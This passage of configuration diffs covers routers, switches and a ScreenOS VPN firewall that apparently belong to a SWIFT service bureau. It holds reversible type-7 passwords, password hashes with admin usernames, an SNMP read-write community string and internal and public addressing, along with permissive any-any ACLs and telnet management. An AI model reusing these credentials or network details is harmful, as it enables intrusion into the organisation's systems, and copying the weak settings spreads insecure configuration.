+ encapsulation slip
+!
+interface Async0/337
+ no ip address
+ encapsulation slip
+!
+interface Async0/338
+ no ip address
+ encapsulation slip
+!
+interface Async0/339
+ no ip address
+ encapsulation slip
+!
+interface Async0/340
+ no ip address
+ encapsulation slip
+!
+interface Async0/341
+ no ip address
+ encapsulation slip
+!
+interface Async0/342
+ no ip address
+ encapsulation slip
+!
+interface Async0/343
+ no ip address
+ encapsulation slip
+!
+interface Async0/344
+ no ip address
+ encapsulation slip
+!
+interface Async0/345
+ no ip address
+ encapsulation slip
+!
+interface Async0/346
+ no ip address
+ encapsulation slip
+!
+interface Async0/347
+ no ip address
+ encapsulation slip
+!
+interface Async0/348
+ no ip address
+ encapsulation slip
+!
+interface Async0/349
+ no ip address
+ encapsulation slip
+!
+interface Async0/350
+ no ip address
+ encapsulation slip
+!
+interface Async0/351
+ no ip address
+ encapsulation slip
+!
+interface Async0/352
+ no ip address
+ encapsulation slip
+!
+interface Async0/353
+ no ip address
+ encapsulation slip
+!
+interface Async0/354
+ no ip address
+ encapsulation slip
+!
+interface Async0/355
+ no ip address
+ encapsulation slip
+!
+interface Async0/356
+ no ip address
+ encapsulation slip
+!
+interface Async0/357
+ no ip address
+ encapsulation slip
+!
+interface Async0/386
+ no ip address
+ encapsulation slip
+!
+interface Async0/387
+ no ip address
+ encapsulation slip
+!
+interface Async0/388
+ no ip address
+ encapsulation slip
+!
+interface Async0/389
+ no ip address
+ encapsulation slip
+!
+interface Async0/390
+ no ip address
+ encapsulation slip
+!
+interface Async0/391
+ no ip address
+ encapsulation slip
+!
+interface Async0/392
+ no ip address
+ encapsulation slip
+!
+interface Async0/393
+ no ip address
+ encapsulation slip
+!
+interface Async0/394
+ no ip address
+ encapsulation slip
+!
+interface Async0/395
+ no ip address
+ encapsulation slip
+!
+interface Async0/396
+ no ip address
+ encapsulation slip
+!
+interface Async0/397
+ no ip address
+ encapsulation slip
+!
+interface Async0/398
+ no ip address
+ encapsulation slip
+!
+interface Async0/399
+ no ip address
+ encapsulation slip
+!
+interface Async0/400
+ no ip address
+ encapsulation slip
+!
+interface Async0/401
+ no ip address
+ encapsulation slip
+!
+interface Async0/402
+ no ip address
+ encapsulation slip
+!
+interface Async0/403
+ no ip address
+ encapsulation slip
+!
+interface Async0/404
+ no ip address
+ encapsulation slip
+!
+interface Async0/405
+ no ip address
+ encapsulation slip
+!
+interface Async0/406
+ no ip address
+ encapsulation slip
+!
+interface Async0/407
+ no ip address
+ encapsulation slip
+!
+interface Async0/408
+ no ip address
+ encapsulation slip
+!
+interface Async0/409
+ no ip address
+ encapsulation slip
+!
+interface Async0/410
+ no ip address
+ encapsulation slip
+!
+interface Async0/411
+ no ip address
+ encapsulation slip
+!
+interface Async0/412
+ no ip address
+ encapsulation slip
+!
+interface Async0/413
+ no ip address
+ encapsulation slip
+!
+interface Async0/414
+ no ip address
+ encapsulation slip
+!
+interface Async0/415
+ no ip address
+ encapsulation slip
+!
+interface Async0/416
+ no ip address
+ encapsulation slip
+!
+interface Async0/417
+ no ip address
+ encapsulation slip
+!
+interface Async0/418
+ no ip address
+ encapsulation slip
+!
+interface Async0/419
+ no ip address
+ encapsulation slip
+!
+interface Async0/420
+ no ip address
+ encapsulation slip
+!
+interface Async0/421
+ no ip address
+ encapsulation slip
+!
+interface Dialer0
+ no ip address
+!
+interface Dialer1
+ description connected to Dial-inPCs(ISDN)
+ ip address 10.91.115.1 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ peer default ip address pool ENSBDRTR1-Group-1
+ no cdp enable
+ ppp max-bad-auth 3
+ ppp authentication pap
+!
+interface Dialer2
+ description connected to Dial-inPCs(ISDN)_1
+ ip address 10.91.115.9 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-2
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer3
+ description connected to Dial-inPCs(ISDN)_2
+ ip address 10.91.115.17 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-3
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer4
+ description connected to Dial-inPCs(ISDN)_3
+ ip address 10.91.115.25 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-4
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer5
+ description connected to Dial-inPCs(ISDN)_4
+ ip address 10.91.115.33 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-5
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer6
+ description connected to Dial-inPCs(ISDN)_5
+ ip address 10.91.115.41 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-6
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer7
+ description connected to Dial-inPCs(ISDN)_6
+ ip address 10.91.115.49 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer in-band
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-7
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer8
+ description connected to Dial-inPCs(ISDN)_7
+ ip address 10.91.115.57 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer idle-timeout 10000
+ dialer-group 102
+ peer default ip address pool ENSBDRTR1-Group-8
+ no cdp enable
+ ppp authentication pap
+!
+interface Dialer9
+ description connected to BankSaderatIran
+ ip address 10.91.115.65 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer remote-name Router
+ dialer idle-timeout 10000 either
+ dialer-group 102
+ no cdp enable
+ ppp authentication chap pap
+!
+interface Dialer10
+ description connected to OAB
+ ip address negotiated
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer remote-name HQR4
+ dialer idle-timeout 10000 either
+ dialer-group 102
+ no cdp enable
+ ppp authentication chap pap
+ ppp chap hostname HQR4
+ ppp chap password 7 09694F1A0D2B120618
+ ppp pap sent-username HQR4 password 7 08044D5D1D37000301
+ ppp multilink
+!
+interface Dialer11
+ description connected to PSTN Dialin clients
+ ip unnumbered Loopback1
+ encapsulation ppp
+ ip tcp header-compression
+ dialer in-band
+ dialer-group 101
+ peer default ip address pool PSTNPool1
+ no cdp enable
+ ppp authentication pap chap
+!
+interface Dialer12
+ description connected to Oasis Capital
+ ip address 10.91.115.89 255.255.255.248
+ encapsulation ppp
+ no ip split-horizon
+ dialer pool 1
+ dialer remote-name OASIS-INTERNET-ROUTER
+ dialer idle-timeout 10000 either
+ dialer-group 102
+ no cdp enable
+ ppp authentication chap pap
+!
+interface Dialer60
+ ip address 5.5.5.1 255.255.255.252
+ encapsulation ppp
+ shutdown
+ dialer pool 1
+ dialer remote-name ENSBPRTR1
+ dialer string 0
+ dialer-group 101
+ no peer default ip address
+ ppp authentication chap
+!
+interface Dialer70
+ ip address 6.6.6.1 255.255.255.252
+ encapsulation ppp
+ dialer pool 1
+ dialer remote-name ENSBURTR1
+ dialer string 0
+ dialer-group 101
+ ppp authentication chap
+!
+interface Dialer101
+ description connected to ISDN ENSBBRTR1
+ ip address 10.92.115.249 255.255.255.248
+ encapsulation ppp
+ dialer pool 1
+ dialer remote-name ENSBBRTR1
+ dialer idle-timeout 120 either
+ dialer fast-idle 30
+ dialer string 90097317584471
+ dialer-group 101
+ no peer default ip address
+ no cdp enable
+ ppp authentication chap
+!
+interface Dialer1001
+ description connected to testdxb
+ ip address 10.91.115.81 255.255.255.248
+ encapsulation ppp
+ dialer pool 1
+ peer default ip address 10.91.115.82
+ ppp authentication chap callin
+ ppp chap hostname asdf1
+!
+interface Group-Async1
+ physical-layer async
+ no ip address
+ encapsulation slip
+!
+ip local pool PSTNPool1 10.92.115.2 10.92.115.100
+ip local pool ENSBDRTR1-Group-1 10.91.115.2 10.91.115.3
+ip local pool ENSBDRTR1-Group-2 10.91.115.10 10.91.115.11
+ip local pool ENSBDRTR1-Group-3 10.91.115.18 10.91.115.19
+ip local pool ENSBDRTR1-Group-4 10.91.115.26 10.91.115.27
+ip local pool ENSBDRTR1-Group-5 10.91.115.34 10.91.115.35
+ip local pool ENSBDRTR1-Group-6 10.91.115.42 10.91.115.43
+ip local pool ENSBDRTR1-Group-7 10.91.115.50 10.91.115.51
+ip local pool ENSBDRTR1-Group-8 10.91.115.58 10.91.115.59
+ip local pool ENSBDRTR1-PRI 10.91.116.10 10.91.116.40
+ip forward-protocol nd
+ip route 0.0.0.0 0.0.0.0 192.168.207.5
+ip route 1.1.1.1 255.255.255.255 Serial0/0/0
+ip route 10.0.0.0 255.255.255.240 10.10.201.2
+ip route 10.10.33.20 255.255.255.252 Serial0/0/0
+ip route 10.10.200.0 255.255.255.248 10.10.201.2
+ip route 10.95.115.0 255.255.255.0 Dialer60
+ip route 192.168.100.0 255.255.255.0 Dialer9
+ip route 192.168.200.0 255.255.255.0 Dialer9
+ip route 192.168.206.10 255.255.255.255 192.168.215.4
+ip route 192.168.206.110 255.255.255.255 192.168.215.4
+ip route 192.168.206.111 255.255.255.255 192.168.215.4
+ip route 192.168.208.0 255.255.255.240 172.16.1.1
+ip route 192.168.217.0 255.255.255.192 Dialer101
+ip route 192.168.247.0 255.255.255.0 Dialer60
+ip route 192.168.248.0 255.255.255.0 Dialer70
+!
+!
+ip http server
+!
+access-list 101 permit ip any any log
+access-list 101 permit icmp any any log
+access-list 101 permit esp any any log
+access-list 101 permit ahp any any log
+access-list 101 permit udp any any
+access-list 102 permit ip any any log
+access-list 102 permit icmp any any log
+access-list 102 permit esp any any log
+access-list 102 permit ahp any any log
+access-list 102 permit udp any any
+access-list 105 permit ip any any log
+dialer-list 1 protocol ip permit
+dialer-list 101 protocol ip list 101
+dialer-list 102 protocol ip list 102
+!
+!
+control-plane
+!
+!
+line con 0
+ exec-timeout 0 0
+ password 7 02050D480809
+ logging synchronous
+line aux 0
+line 0/322 0/357
+line 0/386 0/421
+line vty 0 4
+ session-timeout 10 
+ exec-timeout 0 0
+ password 7 096C1F0C174B24302509103D2436236215
+ logging synchronous
+line vty 5 9
+ session-timeout 10 
+ password 7 013357015545352D0F495A1E16171C432B
+!
+scheduler allocate 20000 1000
+end

swift/00562_0_ENSBDSW01-02AUG2013

@@ -0,0 +1,332 @@
+
+!
+! Last configuration change at 13:09:06 ZP4 Tue Jul 16 2013
+! NVRAM config last updated at 13:09:07 ZP4 Tue Jul 16 2013
+!
+version 12.2
+no service pad
+service timestamps debug datetime msec
+service timestamps log datetime msec
+service password-encryption
+service sequence-numbers
+!
+hostname SW1_R1
+!
+boot-start-marker
+boot-end-marker
+!
+enable secret 5 $1$hqa8$dhoSENtP/B83aE9trxClH0
+!
+no aaa new-model
+clock timezone ZP4 4
+system mtu routing 1500
+ip subnet-zero
+!
+!
+!
+crypto pki trustpoint TP-self-signed-3555448576
+ enrollment selfsigned
+ subject-name cn=IOS-Self-Signed-Certificate-3555448576
+ revocation-check none
+ rsakeypair TP-self-signed-3555448576
+!
+!
+crypto pki certificate chain TP-self-signed-3555448576
+ certificate self-signed 01 nvram:IOS-Self-Sig#3601.cer
+!
+!
+!
+!
+!
+!
+spanning-tree mode pvst
+spanning-tree extend system-id
+spanning-tree vlan 10,104-105,190,196,200-204,206-209,211,213 priority 24576
+spanning-tree vlan 214-215,217-219,224,235 priority 24576
+spanning-tree vlan 101-102,225,227 priority 4096
+!
+vlan internal allocation policy ascending
+!
+!
+!
+interface GigabitEthernet0/1
+ switchport access vlan 224
+!
+interface GigabitEthernet0/2
+ switchport access vlan 224
+!
+interface GigabitEthernet0/3
+!
+interface GigabitEthernet0/4
+ switchport mode trunk
+!
+interface GigabitEthernet0/5
+ switchport mode trunk
+!
+interface GigabitEthernet0/6
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/7
+ switchport access vlan 204
+ switchport mode access
+!
+interface GigabitEthernet0/8
+ switchport access vlan 104
+ switchport mode access
+ no cdp enable
+!
+interface GigabitEthernet0/9
+ switchport access vlan 205
+ switchport mode access
+!
+interface GigabitEthernet0/10
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/11
+ switchport access vlan 196
+ switchport mode access
+!
+interface GigabitEthernet0/12
+ description VPN-ColdStandBy
+ switchport access vlan 206
+ switchport mode access
+ shutdown
+!
+interface GigabitEthernet0/13
+ description VPN-ColdStandBy
+ switchport access vlan 215
+ switchport mode access
+ shutdown
+!
+interface GigabitEthernet0/14
+ description VPN-ColdStandBy
+ switchport access vlan 101
+ switchport mode access
+ shutdown
+!
+interface GigabitEthernet0/15
+ description VPN-ColdStandBy
+ switchport access vlan 225
+ switchport mode access
+ shutdown
+!
+interface GigabitEthernet0/16
+ description VPN-ColdStandBy
+ switchport access vlan 235
+ switchport mode access
+ shutdown
+!
+interface GigabitEthernet0/17
+ description VPN-ColdStandBy
+ switchport access vlan 224
+ switchport mode access
+ shutdown
+!
+interface GigabitEthernet0/18
+ description VPN-ColdStandBy
+ switchport access vlan 102
+ switchport mode access
+ shutdown
+!
+interface GigabitEthernet0/19
+ description VPN-ColdStandBy
+ shutdown
+!
+interface GigabitEthernet0/20
+ description VPN-ColdStandBy
+ shutdown
+!
+interface GigabitEthernet0/21
+ description VPN-ColdStandBy
+ switchport access vlan 104
+ shutdown
+!
+interface GigabitEthernet0/22
+ description VPN-ColdStandBy
+ switchport access vlan 105
+ shutdown
+!
+interface GigabitEthernet0/23
+ description ENSBDVPN1
+ switchport access vlan 206
+ switchport mode access
+!
+interface GigabitEthernet0/24
+ description ENSBDVPN1
+ switchport access vlan 215
+ switchport mode access
+!
+interface GigabitEthernet0/25
+ description ENSBDVPN1
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/26
+ description ENSBDVPN1
+ switchport access vlan 225
+ switchport mode access
+!
+interface GigabitEthernet0/27
+ description ENSBDVPN1
+ switchport access vlan 235
+ switchport mode access
+!
+interface GigabitEthernet0/28
+ description ENSBDVPN1
+ switchport access vlan 224
+ switchport mode access
+!
+interface GigabitEthernet0/29
+ description ENSBDVPN1
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/30
+ description ENSBDVPN1
+!
+interface GigabitEthernet0/31
+ description ENSBDVPN1
+!
+interface GigabitEthernet0/32
+ description ENSBDVPN1
+ switchport access vlan 104
+!
+interface GigabitEthernet0/33
+ description ENSBDVPN1
+ switchport access vlan 105
+!
+interface GigabitEthernet0/34
+ description ENSBDVPN5
+ switchport access vlan 206
+ switchport mode access
+!
+interface GigabitEthernet0/35
+ description ENSBDVPN5
+ switchport access vlan 207
+ switchport mode access
+!
+interface GigabitEthernet0/36
+ description ENSBDVPN5
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/37
+ description ENSBDVPN5
+ switchport access vlan 211
+ switchport mode access
+!
+interface GigabitEthernet0/38
+ description ENSBDVPN5
+!
+interface GigabitEthernet0/39
+ description ENSBDVPN5
+!
+interface GigabitEthernet0/40
+ description ENSBDVPN5
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/41
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/42
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/43
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/44
+ description AEINAEAD-MPLS
+ switchport access vlan 225
+ switchport mode access
+ no cdp enable
+ spanning-tree portfast
+ spanning-tree bpdufilter enable
+!
+interface GigabitEthernet0/45
+ description AEINAEAD-MPLS
+ switchport access vlan 225
+ switchport mode access
+ no cdp enable
+!
+interface GigabitEthernet0/46
+ switchport access vlan 235
+ switchport mode access
+ media-type rj45
+ speed 100
+ duplex full
+ no cdp enable
+!
+interface GigabitEthernet0/47
+ switchport mode trunk
+!
+interface GigabitEthernet0/48
+ switchport mode trunk
+!
+interface Vlan1
+ no ip address
+ no ip route-cache
+ shutdown
+!
+interface Vlan150
+ no ip address
+ no ip route-cache
+!
+interface Vlan208
+ ip address 192.168.208.21 255.255.255.0
+ no ip route-cache
+!
+ip http server
+ip http secure-server
+logging trap warnings
+logging 192.168.208.11
+access-list 101 permit ahp host 192.168.215.137 host 192.168.215.140
+access-list 101 permit esp host 192.168.215.137 host 192.168.215.140
+access-list 101 permit udp host 192.168.215.137 host 192.168.215.140 eq isakmp
+snmp-server community ENSB RW
+snmp-server enable traps snmp authentication linkdown linkup coldstart warmstart
+snmp-server enable traps transceiver all
+snmp-server enable traps tty
+snmp-server enable traps cluster
+snmp-server enable traps entity
+snmp-server enable traps cpu threshold
+snmp-server enable traps vtp
+snmp-server enable traps vlancreate
+snmp-server enable traps vlandelete
+snmp-server enable traps flash insertion removal
+snmp-server enable traps port-security
+snmp-server enable traps envmon fan shutdown supply temperature status
+snmp-server enable traps power-ethernet group 1
+snmp-server enable traps power-ethernet police
+snmp-server enable traps config-copy
+snmp-server enable traps config
+snmp-server enable traps config-ctid
+snmp-server enable traps rtr
+snmp-server enable traps bridge newroot topologychange
+snmp-server enable traps stpx inconsistency root-inconsistency loop-inconsistency
+snmp-server enable traps syslog
+snmp-server enable traps mac-notification change move threshold
+snmp-server enable traps vlan-membership
+snmp-server enable traps errdisable
+snmp-server host 192.168.208.11 ENSB 
+!
+control-plane
+!
+!
+line con 0
+ logging synchronous
+line vty 0 4
+ password 7 013357015545352D0F495A1E16171C432B
+ logging synchronous
+ login
+line vty 5 15
+ password 7 013357015545352D0F495A1E16171C432B
+ logging synchronous
+ login
+!
+end

swift/00563_0_ENSBDSW02-02AUG2013

@@ -0,0 +1,280 @@
+
+!
+! Last configuration change at 00:28:58 UTC Fri Jul 12 2013
+! NVRAM config last updated at 00:29:33 UTC Fri Jul 12 2013
+!
+version 12.2
+no service pad
+service timestamps debug datetime msec
+service timestamps log datetime msec
+service password-encryption
+!
+hostname SW2_R1
+!
+boot-start-marker
+boot-end-marker
+!
+enable secret 5 $1$wWDW$qvebxWrY9.uAOXK.xsQs91
+!
+no aaa new-model
+system mtu routing 1500
+ip subnet-zero
+!
+!
+!
+crypto pki trustpoint HTTPS_SS_CERT_KEYPAIR
+ enrollment selfsigned
+ serial-number
+ revocation-check none
+ rsakeypair HTTPS_SS_CERT_KEYPAIR
+!
+!
+crypto pki certificate chain HTTPS_SS_CERT_KEYPAIR
+ certificate self-signed 01 nvram:D3D19A80host#2E01.cer
+!
+!
+!
+!
+!
+!
+spanning-tree mode pvst
+spanning-tree extend system-id
+spanning-tree vlan 10,101-102,104-105,190,196,200-204,206-209 priority 28672
+spanning-tree vlan 211,213-215,217-219,224-225,227,235 priority 28672
+!
+vlan internal allocation policy ascending
+!
+!
+!
+interface GigabitEthernet0/1
+ switchport access vlan 206
+ switchport trunk native vlan 206
+ switchport mode trunk
+!
+interface GigabitEthernet0/2
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/3
+ switchport access vlan 196
+ switchport mode access
+!
+interface GigabitEthernet0/4
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/5
+!
+interface GigabitEthernet0/6
+ switchport access vlan 105
+ switchport mode access
+!
+interface GigabitEthernet0/7
+ switchport access vlan 204
+ switchport mode access
+!
+interface GigabitEthernet0/8
+ switchport access vlan 105
+ switchport mode access
+ no cdp enable
+!
+interface GigabitEthernet0/9
+ switchport access vlan 205
+ switchport mode access
+!
+interface GigabitEthernet0/10
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/11
+ switchport access vlan 196
+ switchport mode access
+!
+interface GigabitEthernet0/12
+ description AIB PIX IN
+ switchport access vlan 190
+!
+interface GigabitEthernet0/13
+ description AIB PIX OUT
+ switchport access vlan 206
+!
+interface GigabitEthernet0/14
+!
+interface GigabitEthernet0/15
+!
+interface GigabitEthernet0/16
+!
+interface GigabitEthernet0/17
+!
+interface GigabitEthernet0/18
+ switchport access vlan 235
+ switchport mode access
+ no cdp enable
+!
+interface GigabitEthernet0/19
+ switchport access vlan 225
+ switchport mode access
+!
+interface GigabitEthernet0/20
+!
+interface GigabitEthernet0/21
+!
+interface GigabitEthernet0/22
+!
+interface GigabitEthernet0/23
+ description ENSBDVPN2
+ switchport access vlan 206
+ switchport mode access
+!
+interface GigabitEthernet0/24
+ description ENSBDVPN2
+ switchport access vlan 215
+ switchport mode access
+!
+interface GigabitEthernet0/25
+ description ENSBDVPN2
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/26
+ description ENSBDVPN2
+ switchport access vlan 225
+ switchport mode access
+!
+interface GigabitEthernet0/27
+ description ENSBDVPN2
+ switchport access vlan 235
+ switchport mode access
+!
+interface GigabitEthernet0/28
+ description ENSBDVPN2
+ switchport access vlan 224
+ switchport mode access
+!
+interface GigabitEthernet0/29
+ description ENSBDVPN2
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/30
+ description ENSBDVPN2
+!
+interface GigabitEthernet0/31
+ description ENSBDVPN2
+!
+interface GigabitEthernet0/32
+ description ENSBDVPN2
+!
+interface GigabitEthernet0/33
+ description ENSBDVPN2
+!
+interface GigabitEthernet0/34
+ switchport access vlan 206
+ switchport mode access
+!
+interface GigabitEthernet0/35
+ switchport access vlan 207
+ switchport mode access
+!
+interface GigabitEthernet0/36
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/37
+ switchport access vlan 211
+ switchport mode access
+!
+interface GigabitEthernet0/38
+!
+interface GigabitEthernet0/39
+!
+interface GigabitEthernet0/40
+ switchport access vlan 102
+ switchport mode access
+!
+interface GigabitEthernet0/41
+ switchport access vlan 221
+ switchport mode access
+!
+interface GigabitEthernet0/42
+ switchport access vlan 208
+ switchport mode access
+!
+interface GigabitEthernet0/43
+ switchport access vlan 101
+ switchport mode access
+!
+interface GigabitEthernet0/44
+ switchport access vlan 225
+ switchport mode access
+ spanning-tree portfast
+ spanning-tree bpdufilter enable
+!
+interface GigabitEthernet0/45
+!
+interface GigabitEthernet0/46
+ switchport access vlan 235
+ media-type rj45
+ speed 100
+ duplex half
+!
+interface GigabitEthernet0/47
+ switchport mode trunk
+!
+interface GigabitEthernet0/48
+ switchport mode trunk
+!
+interface Vlan1
+ no ip address
+ no ip route-cache
+!
+interface Vlan208
+ ip address 192.168.208.22 255.255.255.0
+ no ip route-cache
+!
+ip http server
+ip http secure-server
+logging trap warnings
+logging 192.168.208.11
+snmp-server community ENSB RW
+snmp-server enable traps snmp authentication linkdown linkup coldstart warmstart
+snmp-server enable traps transceiver all
+snmp-server enable traps tty
+snmp-server enable traps cluster
+snmp-server enable traps entity
+snmp-server enable traps cpu threshold
+snmp-server enable traps vtp
+snmp-server enable traps vlancreate
+snmp-server enable traps vlandelete
+snmp-server enable traps flash insertion removal
+snmp-server enable traps port-security
+snmp-server enable traps envmon fan shutdown supply temperature status
+snmp-server enable traps power-ethernet group 1
+snmp-server enable traps power-ethernet police
+snmp-server enable traps config-copy
+snmp-server enable traps config
+snmp-server enable traps config-ctid
+snmp-server enable traps rtr
+snmp-server enable traps bridge newroot topologychange
+snmp-server enable traps stpx inconsistency root-inconsistency loop-inconsistency
+snmp-server enable traps syslog
+snmp-server enable traps mac-notification change move threshold
+snmp-server enable traps vlan-membership
+snmp-server enable traps errdisable
+snmp-server host 192.168.208.11 ENSB 
+!
+control-plane
+!
+!
+line con 0
+ logging synchronous
+line vty 0 4
+ password 7 052B570A2F027D2B37000305041E0F7B0B
+ logging synchronous
+ login
+line vty 5 15
+ password 7 052B570A2F027D2B37000305041E0F7B0B
+ logging synchronous
+ login
+!
+end

swift/00566_0_ENSBPVPN1.txt

@@ -0,0 +1,564 @@
+set clock dst-off
+set clock timezone 5
+set vrouter trust-vr sharable
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset auto-route-export
+exit
+set service "EN_SAG_FIN" protocol tcp src-port 0-65535 dst-port 48002-48002 
+set service "EN_SAG_FAct" protocol tcp src-port 0-65535 dst-port 48003-48003 
+set service "SWP_TCP48600" protocol tcp src-port 0-65535 dst-port 48600-48600 
+set auth-server "Local" id 0
+set auth-server "Local" server-name "Local"
+set auth-server "RSA_Server" id 1
+set auth-server "RSA_Server" server-name "192.168.206.100"
+set auth-server "RSA_Server" account-type auth xauth 
+set auth-server "RSA_Server" type securid
+set auth default auth server "Local"
+set auth radius accounting port 27911
+set admin name "ENSBadmin"
+set admin password "nBd5PIrLLusBciHPhs0PBnMtk5Dm5n"
+set admin user "juy" password "nG5aE+reBeQIcQYK4sPHRuHtGdG0Kn" privilege "all"
+set admin user "adesear" password "nLtbNIrRDSPEcrMDFs7MT5Htz8Cifn" privilege "all"
+set admin user "msaeed" password "nF3dKrrkHDHCckxALsfARkBtenLoAn" privilege "all"
+set admin user "kbaluyot" password "nMSQP4rHLyxHcWqBmsqP9pMtnMGPYn" privilege "all"
+set admin ssh port 2194
+set admin auth timeout 10
+set admin auth server "Local"
+set admin auth banner telnet login "EastNets Service Bureau: AUTHORIZED PERSON ONLY! "
+set admin auth banner console login "EastNets Service Bureau: AUTHORIZED PERSON ONLY! "
+set admin format dos
+set zone "Trust" vrouter "trust-vr"
+set zone "Untrust" vrouter "trust-vr"
+set zone "DMZ" vrouter "trust-vr"
+set zone "VLAN" vrouter "trust-vr"
+set zone "Untrust-Tun" vrouter "trust-vr"
+set zone "Trust" tcp-rst 
+set zone "Untrust" block 
+unset zone "Untrust" tcp-rst 
+set zone "MGT" block 
+set zone "DMZ" tcp-rst 
+set zone "VLAN" block 
+set zone "VLAN" tcp-rst 
+set zone "Untrust" screen icmp-flood
+set zone "Untrust" screen udp-flood
+set zone "Untrust" screen port-scan
+set zone "Untrust" screen ip-sweep
+set zone "Untrust" screen tear-drop
+set zone "Untrust" screen syn-flood
+set zone "Untrust" screen ip-spoofing
+set zone "Untrust" screen ping-death
+set zone "Untrust" screen ip-filter-src
+set zone "Untrust" screen land
+set zone "Untrust" screen syn-frag
+set zone "Untrust" screen tcp-no-flag
+set zone "Untrust" screen ip-bad-option
+set zone "Untrust" screen icmp-fragment
+set zone "Untrust" screen syn-fin
+set zone "Untrust" screen fin-no-ack
+set zone "Untrust" screen syn-ack-ack-proxy
+set zone "V1-Untrust" screen tear-drop
+set zone "V1-Untrust" screen syn-flood
+set zone "V1-Untrust" screen ping-death
+set zone "V1-Untrust" screen ip-filter-src
+set zone "V1-Untrust" screen land
+set interface "ethernet0/0" zone "Trust"
+set interface "ethernet0/1" zone "Untrust"
+set interface "ethernet0/2" zone "Untrust"
+set interface "tunnel.1" zone "Untrust"
+set interface "tunnel.2" zone "Untrust"
+set interface "tunnel.3" zone "Untrust"
+set interface "tunnel.4" zone "Untrust"
+set interface "tunnel.5" zone "Untrust"
+unset interface vlan1 ip
+set interface ethernet0/0 ip 192.168.246.7/24
+set interface ethernet0/0 nat
+set interface ethernet0/1 ip 192.168.247.7/24
+set interface ethernet0/1 route
+set interface ethernet0/2 ip 202.63.216.20/28
+set interface ethernet0/2 route
+set interface tunnel.1 ip 10.10.0.1/16
+set interface tunnel.2 ip 10.20.0.1/16
+set interface tunnel.3 ip 10.30.0.1/25
+set interface tunnel.4 ip 10.30.0.129/25
+set interface tunnel.5 ip 10.40.0.50/16
+unset interface vlan1 bypass-others-ipsec
+unset interface vlan1 bypass-non-ip
+set interface ethernet0/0 manage-ip 192.168.246.5
+set interface ethernet0/1 manage-ip 192.168.247.5
+set interface ethernet0/2 manage-ip 202.63.216.18
+set interface ethernet0/0 ip manageable
+set interface ethernet0/1 ip manageable
+set interface ethernet0/2 ip manageable
+set interface ethernet0/1 manage ping
+set interface ethernet0/1 manage ssh
+set interface ethernet0/1 manage telnet
+set interface ethernet0/1 manage snmp
+set interface ethernet0/1 manage ssl
+set interface ethernet0/1 manage web
+set interface ethernet0/1 manage ident-reset
+set interface ethernet0/2 manage ping
+set interface ethernet0/2 manage ssh
+set interface ethernet0/2 manage telnet
+set interface ethernet0/2 manage snmp
+set interface ethernet0/2 manage ssl
+set interface ethernet0/2 manage web
+set interface ethernet0/2 manage ident-reset
+set auth-server "RSA_Server" src-interface "ethernet0/0"
+unset flow no-tcp-seq-check
+set flow tcp-syn-check
+set console page 10
+set hostname ENSBPVPN1
+set pki authority default scep mode "auto"
+set pki x509 default cert-path partial
+set dns host dns1 202.63.197.6
+set dns host dns2 202.63.192.12
+set dns host dns3 0.0.0.0
+set address "Trust" "192.168.246.0/24" 192.168.246.0 255.255.255.0
+set address "Trust" "ENSBPK_SAG1" 192.168.246.25 255.255.255.255
+set address "Trust" "ENSBPK_SAG2" 192.168.246.20 255.255.255.255
+set address "Trust" "ENSBPK_SWP1" 192.168.246.30 255.255.255.255
+set address "Trust" "NW_ENSBPK" 192.168.246.0 255.255.255.0
+set address "Untrust" "NW_ENDXB_HQ" 213.132.40.96 255.255.255.240
+set address "Untrust" "NW_ENSBDXB" 192.168.206.0 255.255.255.0
+set address "Untrust" "NW_ENSBDXB_Public" 213.132.51.16 255.255.255.240
+set address "Untrust" "NW_ENSBPK_CUST_DRCP" 172.23.0.0 255.255.0.0 "DRCP Client GNAT"
+set address "Untrust" "NW_ENSBPK_CUST_GWCP" 172.22.0.0 255.255.0.0 "GWCP Client GNAT"
+set address "Untrust" "NW_NOC" 192.168.196.0 255.255.255.0
